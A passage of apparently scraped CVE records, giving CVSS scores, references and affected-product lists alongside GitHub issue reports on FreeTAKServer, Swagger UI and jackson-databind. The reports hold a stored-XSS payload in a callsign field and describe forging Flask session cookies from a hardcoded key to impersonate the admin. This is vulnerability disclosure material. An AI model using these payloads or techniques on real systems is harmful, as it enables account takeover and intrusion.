"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/FreeTAKTeam/UI/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "UI" ]
In the FreeTAKServer-UI there is a function to create and view Emergency Alerts that are originating from either the End User Device or from the UI itself. Both Avenues are susceptible to a Stored Cross Site scripting vulnerability in the Callsign parameter. ##### Web Interface In the case of a XSS in the WebUI it is as simple as having a callsign with the payload of `<img src onerror=alert(/payload/)>` which will trigger the Emergency function and display the emergency in the WebUI. ![xss_webui_payload](https://user-images.githubusercontent.com/14073684/154237327-177a4fbe-86e4-4c29-9633-6e9a2a32a1ba.jpg) ![xss_webui_alert](https://user-images.githubusercontent.com/14073684/154237340-0874bc59-57aa-4250-9d44-328ce9580c95.jpg) ##### End User Device What's more interesting of a scenario is that it is possible to push Emergencies from any of the EUDs, these can range from a 911, TIC (Troops in Contact) or similar. This can be chained together with the API keys leakage in the response in order to obtain a server RestAPI key for further exploitation, which can take a normal user in the field to a Web Server admin ![xss_enduserdevice_payload](https://user-images.githubusercontent.com/14073684/154237378-b426d216-6b62-4734-bcad-3dc118ae1557.jpg) ![xss_enduserdevice_webui_payload](https://user-images.githubusercontent.com/14073684/154237622-09e69aa7-17b5-4066-87a2-d64c27dd85c3.jpg) ![xss_enduserdevice_alert](https://user-images.githubusercontent.com/14073684/154237651-8249f345-ba06-4459-926a-7d8875069475.jpg)
XSS through Emergency Alert
https://api.github.com/repos/FreeTAKTeam/UI/issues/28/comments
0
2022-02-16T09:44:15Z
2022-09-14T17:45:24Z
https://github.com/FreeTAKTeam/UI/issues/28
1,139,778,219
28
3,327
CVE-2022-25508
2022-03-11T00:15:08.353
An access control issue in the component /ManageRoute/postRoute of FreeTAKServer v1.9.8 allows unauthenticated attackers to cause a Denial of Service (DoS) via an unusually large amount of created routes, or create unsafe or false routes for legitimate users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/FreeTakServer/issues/291" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/FreeTakServer/issues/291" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "306" ]
306
https://github.com/FreeTAKTeam/FreeTakServer/issues/291
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "FreeTakServer" ]
In the RestAPI there is also the Endpoint _/ManageRoute/postRoute_ which is unauthenticated. While this might not seem interesting at first, it is possible to broadcast new routes (suggested tracks to take) to every End User Device (EUD) connected to the server. This can create two issues, either create a Denial of Service situation where a malicious user can fill the entire map with routes, making it impossible to use the map in the EUD. The second scenario might be to create a route on which possible users might take and therefor control some of the paths and direct users into bad situations. ![Unauthenticated-Endpoint](https://user-images.githubusercontent.com/14073684/154237142-9d5c1649-15fa-49d5-9f4f-68bbd64dae3e.jpg)
Unauthenticated Public RestAPI Endpoint
https://api.github.com/repos/FreeTAKTeam/FreeTakServer/issues/291/comments
1
2022-02-16T09:39:27Z
2022-03-12T17:49:17Z
https://github.com/FreeTAKTeam/FreeTakServer/issues/291
1,139,773,235
291
3,328
CVE-2022-25510
2022-03-11T00:15:08.397
FreeTAKServer 1.9.8 contains a hardcoded Flask secret key which allows attackers to create crafted cookies to bypass authentication or escalate privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/FreeTakServer/issues/292" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/FreeTakServer/issues/292" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "798" ]
798
https://github.com/FreeTAKTeam/FreeTakServer/issues/292
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "FreeTakServer" ]
In the sourcecode there are 3 relevant places that the Flask Secrets Key are hardcoded. Flask signs all their client sessions with this secret key, usually defined in an _Environment Variable_. In this case though there's these three places that these are hardcoded into. ![Github_Flask_Secret-key](https://user-images.githubusercontent.com/14073684/154238555-6f4fdf89-126b-487b-bde4-10dac1370a41.jpg) This gives a malicious user the ability to sign their own cookies (using for example: [Flask-Unsign](https://github.com/Paradoxis/Flask-Unsign)), and internally change the UID of the current user and assume any other user, for example UID 1 which is the Admin. (Privilege Escalation) Another interessting issue that you run into aswell is that having two Flask servers with the same _secret key_ makes it possible for a user to reuse a UID 1 cookie from Server A, and apply that cookie to Server B logging in to the same UID 1. (Lateral movement/Authentication bypass).
Hardcoded Flask Secrets Key - "Privilege Escalation"
https://api.github.com/repos/FreeTAKTeam/FreeTakServer/issues/292/comments
1
2022-02-16T09:47:16Z
2022-03-12T17:48:51Z
https://github.com/FreeTAKTeam/FreeTakServer/issues/292
1,139,781,389
292
3,329
CVE-2022-25512
2022-03-11T00:15:08.503
FreeTAKServer-UI v1.9.8 was discovered to leak sensitive API and Websocket keys.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FreeTAKTeam/UI/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:freetakserver-ui_project:freetakserver-ui:1.9.8:*:*:*:*:*:*:*", "matchCriteriaId": "A13C85E9-A6CF-4B38-8E0E-BB54C8AFD3A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/FreeTAKTeam/UI/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FreeTAKTeam", "UI" ]
The WebUI leaks the RestAPI and Websocket tokens in the javascript source code! These should not be reflected back to the user as that can lead to unintended requests through for example XSS. ##### API Bearer Token ![SourceCode_RestAPI-key](https://user-images.githubusercontent.com/14073684/154236551-6bba6a80-8132-4ee0-9c2b-6ea406cf2446.jpg) ##### Websocket Token ![SourceCode_WebSocket-key](https://user-images.githubusercontent.com/14073684/154236590-4e5379b0-128a-4852-bc82-f8fbca1c09c4.jpg)
API and Websocket Keys Leakage
https://api.github.com/repos/FreeTAKTeam/UI/issues/26/comments
4
2022-02-16T09:36:43Z
2024-05-05T21:28:29Z
https://github.com/FreeTAKTeam/UI/issues/26
1,139,770,507
26
3,330
CVE-2018-25031
2022-03-11T07:15:07.190
Swagger UI 4.1.2 and earlier could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. Note: This was originally claimed to be resolved in 4.1.3. However, third parties have indicated this is not resolved in 4.1.3 and even occurs in that version and possibly others.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/swagger-api/swagger-ui/issues/4872" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/swagger-api/swagger-ui/releases/tag/v4.1.3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220407-0004/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-SWAGGERUI-2314885" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/swagger-api/swagger-ui/issues/4872" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/swagger-api/swagger-ui/releases/tag/v4.1.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220407-0004/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-SWAGGERUI-2314885" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*", "matchCriteriaId": "29C4300C-B377-4221-923F-A804BA5A9348", "versionEndExcluding": "4.1.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/swagger-api/swagger-ui/issues/4872
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "swagger-api", "swagger-ui" ]
### Content & configuration Swagger-UI configuration options: ```js SwaggerUI({ enableQueryConfig: false // new }) ``` ### Is your feature request related to a problem? <!-- Please provide a clear and concise description of what the problem is. "I'm always frustrated when..." --> We’ve observed that the ?url= parameter in SwaggerUI allows an attacker to override an otherwise hard-coded schema file. This opens the door to issues such as https://github.com/swagger-api/swagger-ui/issues/3847 and https://github.com/swagger-api/swagger-ui/pull/4789 which would otherwise be prevented by hard-coding the schema file URL. The behavior appears to be a regression in the 3.x releases. It can easily be reproduced by passing in a URL to the SwaggerUIBundle constructor and then using the ?url parameter to override it, while observing the behavior in the Net panel of your browser’s developer tools. Note that CORS rules can prevent a test from succeeding, but do not prevent a real attack. const ui = SwaggerUIBundle({ ... url: 'some-hard-coded-path.yml' }); Additionally, the URL parameter is dangerous in general because it allows an attacker to provide a similar schema file that instead sends authorization requests to a server under an attacker’s control, which makes it much easier to trick a user into leaking their login credentials. So the URL parameter should not be allowed in any setting where authentication or other sensitive information is used. I’d recommend disabling it by default and cautioning users against enabling it. ### Describe the solution you'd like <!-- A clear and concise description of what you want to happen. --> for 3.x: Add an enableQueryParam or similar option. ~If omitted,~ default to false ~if a URL is passed into the constructor, otherwise default true.~ for 4.x: Change the default ~when omitted~ to false. ### Describe alternatives you've considered <!-- A clear and concise description of any alternative solutions or features you've considered. --> Our workaround was to detect the URL parameter before initializing SwaggerUI and failing early if it was set. ### Additional context This is taken from a security report given to the Swagger team by Ken Winters, based on investigation done by Gaurav Shet and Ben Zulanch - all over at NetApp. The decision was made to put this in the public issue tracker because (a) we aren't going to immediately fix this, and (b) the attack surface for this is significantly diminished by our effective sanitization efforts to deter XSS attacks in documents used as input.
add an `enableQueryConfig` option
https://api.github.com/repos/swagger-api/swagger-ui/issues/4872/comments
5
2018-09-13T03:02:46Z
2022-01-28T15:11:15Z
https://github.com/swagger-api/swagger-ui/issues/4872
359,724,685
4,872
3,331
CVE-2020-36518
2022-03-11T07:15:07.800
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2816" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220506-0004/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5283" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2816" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220506-0004/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5283" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "E4445932-0923-4D28-8911-CFC9B61DFE2B", "versionEndExcluding": "2.12.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "862ED616-15D6-42A2-88DB-9D3F304EFB5D", "versionEndExcluding": "2.13.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.13.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:big_data_spatial_and_graph:*:*:*:*:*:*:*:*", "matchCriteriaId": "384DEDD9-CB26-4306-99D8-83068A9B23ED", "versionEndExcluding": "23.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:coherence:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "5FA64A1D-34F9-4441-857A-25C165E6DBB6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:commerce_platform:11.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "57DA1DD8-E9F1-43C6-BCA2-1E9C92B1664C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:commerce_platform:11.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "869CDD22-4A6C-4665-AA37-E340B07EF81C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:commerce_platform:11.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "8CDE72F7-ED9D-4A53-BF63-DF6711FFDEF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:*:*:*:*:*:*:*:*", "matchCriteriaId": "DCE2010E-A144-4ED2-B73D-1CA3800A8F71", "versionEndExcluding": null, "versionEndIncluding": "12.0.0.6.0", "versionStartExcluding": null, "versionStartIncluding": "12.0.0.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_binding_support_function:22.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "6EDB6772-7FDB-45FF-8D72-952902A7EE56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_console:1.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DAAB7154-4DE8-4806-86D0-C1D33B84417B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:22.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "A264E0DE-209D-49B1-8B26-51AB8BBC97F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:22.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "EBB5FF32-7362-4A1E-AD24-EF6B8770FCAD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:22.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6577F14-36B6-46A5-A1B1-FCCADA61A23B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:22.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "4F4637E5-3324-441D-94E9-C2DBE9A6B502", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_security_edge_protection_proxy:22.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "8B40FAF9-0A6B-41C4-8CAD-D3D1DD982C2C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_service_communication_proxy:22.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C4E817B5-A26B-4EA8-BA93-F87F42114FF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:22.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "74810125-09E6-4F27-B541-AFB61112AC56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", "matchCriteriaId": "69F21EC6-EC2F-4E96-A9DE-621B84105304", "versionEndExcluding": null, "versionEndIncluding": "8.1.0.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "3CC69CF0-6269-40F5-871B-16CFD5EC4C45", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "172BECE8-9626-4910-AAA1-A2FA9C7139E3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "ACB82398-7281-47CF-81F9-A8A67D9C9DFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "AD9AC3A6-9B91-4B55-A320-A40E95F21058", "versionEndExcluding": null, "versionEndIncluding": "8.1.2.1", "versionStartExcluding": null, "versionStartIncluding": "8.1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.0.7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F9319627-379D-4069-8AC9-512D411F22DA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "1AC36036-07CE-4903-8FFB-445C6908F0CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "55F091C7-0869-4FD6-AC73-DA697D990304", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D134C60-F9E2-46C2-8466-DB90AD98439E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_enterprise_case_management:*:*:*:*:*:*:*:*", "matchCriteriaId": "E6F77FFB-558E-4740-A63E-B702EE12EF68", "versionEndExcluding": null, "versionEndIncluding": "8.1.2.1", "versionStartExcluding": null, "versionStartIncluding": "8.1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_enterprise_case_management:8.0.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "C64D669C-513E-4C53-8BB8-13EB336CDC3A", "versionEndExcluding": null, 